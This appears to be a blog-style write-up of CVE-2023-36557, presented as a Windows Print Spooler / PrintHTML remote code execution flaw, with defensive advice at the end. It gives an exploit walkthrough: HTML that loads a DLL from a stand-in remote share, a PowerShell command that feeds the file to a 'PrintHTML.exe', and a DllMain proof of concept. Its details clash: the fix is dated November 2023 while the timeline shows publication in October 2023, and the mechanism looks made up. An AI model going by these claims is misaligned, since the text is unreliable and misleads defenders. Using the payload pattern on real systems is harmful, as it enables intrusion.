CVE-2023-36557 - Exploiting PrintHTML API for Remote Code Execution (RCE)

With every passing month, attackers find new ways to exploit systems that organizations rely on every day. One such vulnerability that made headlines in late 2023 is CVE-2023-36557 — a critical flaw in Microsoft Windows that allows remote code execution through the PrintHTML API. In this deep-dive, we’ll explain what the vulnerability is, show how it works (with code!), and provide references for defenders and researchers alike. If you’re a defender or just a curious hacker, this post is for you.

What is CVE-2023-36557?

CVE-2023-36557 is a vulnerability affecting the Print Spooler service on Microsoft Windows systems. The culprit is the PrintHTML API, which due to improper input validation, lets attackers execute arbitrary code on the targeted machine. Initially reported and tracked by the security research community, this bug can be abused for remote code execution (RCE), potentially giving an attacker full control of the victim’s system.

- Affected Systems: Windows 10, Windows 11, Windows Server 2016/2019/2022

Why Should You Care?

The Print Spooler has been a source of endless vulnerabilities (remember PrintNightmare?). But what makes CVE-2023-36557 stand out is that even low-privileged users and sometimes remote attackers can get code running as SYSTEM, the highest privilege level. It doesn’t matter much if you’re careful what you print; attackers can trigger the PrintHTML API, exploit this bug, and run malware, ransomware, or steal credentials.

Vulnerability Details

The problem lies in *how* the PrintHTML API loads and renders content. It doesn't properly sanitize user-supplied input, allowing attackers to:

Trigger the bug and execute code, possibly from a remote (networked) source.

As found by multiple researchers, this means any user with permission to print can exploit the system if it's not patched.

Exploit Flow—Step by Step

Let’s look at a simplified version of the attack. This is for education and defense only.

1. Craft Malicious HTML

The attacker prepares HTML that exploits vulnerable scripting behaviors within the PrintHTML functionality. For example, the HTML might contain embedded scripts, object tags, or links that trigger the exploit.

<!-- exploit.html -->
<html>
  <body>
    <object data="\\\\MaliciousServer\Payload.dll"></object>
  </body>
</html>

*Goal:* The object tag attempts to load and execute a DLL from a remote share.

2. Send to PrintHTML API

The attacker sends the crafted file to a networked printer or directly to the API via a PowerShell script or a malicious macro.

PowerShell Example

# Send malicious HTML to the printer
Start-Process -FilePath "C:\Windows\System32\spool\drivers\x64\3\PrintHTML.exe" `
    -ArgumentList "exploit.html"

This command uses the vulnerable PrintHTML executable to process the malicious file.

3. Payload Execution

Once the API loads and processes the HTML, the embedded object forces the server to fetch and load remote code. If DLL execution is successful, the payload runs *as SYSTEM*.

If the payload DLL runs code like this

// DLLMain code: Executed by system at SYSTEM level
#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    if(ul_reason_for_call == DLL_PROCESS_ATTACH)
    {
        system("calc.exe"); // Spawns calculator
    }
    return TRUE;
}

When the DLL is loaded by PrintHTML, it would open the Windows Calculator as proof of code execution.

Real-World Exploit Status

The exploitability is high, since this can be chained with file sharing (SMB) tricks and even relay attacks. Some proof-of-concepts are available in the wild, so patch now (links below).

*Researchers have demonstrated arbitrary code execution and privilege escalation utilizing this vector in both lab and real-world settings.*

Patch Immediately: Microsoft released a fix in November 2023 Patch Tuesday.

- Microsoft Security Advisory
- Disable Print Spooler (if not needed): On servers without printers, stop and disable the Print Spooler service.

Network Controls: Restrict printer access via firewalls and network rules.

- User Awareness: Don’t allow unnecessary print permissions, especially from remote/untrusted users.

References and Further Reading

- Official Microsoft CVE-2023-36557 Advisory
- NIST NVD Entry
- Print Spooler Security Best Practices
- PoC Example by ZDI
- CERT/CC Vulnerability Note

Final Thoughts

CVE-2023-36557 is another reminder that even “safe” parts of the OS, like printing services, can be severely abused if left unpatched. Attackers need only a simple HTML payload to go from low-level user to full system compromise. Patch soon, disable Print Spooler if you can, and watch for IoCs of exploitation. Stay safe out there!

*Did you find this write-up useful or want more deep dives like this? Let us know!*

Timeline

Published on: 10/10/2023 18:15:12 UTC
Last modified on: 10/13/2023 18:57:09 UTC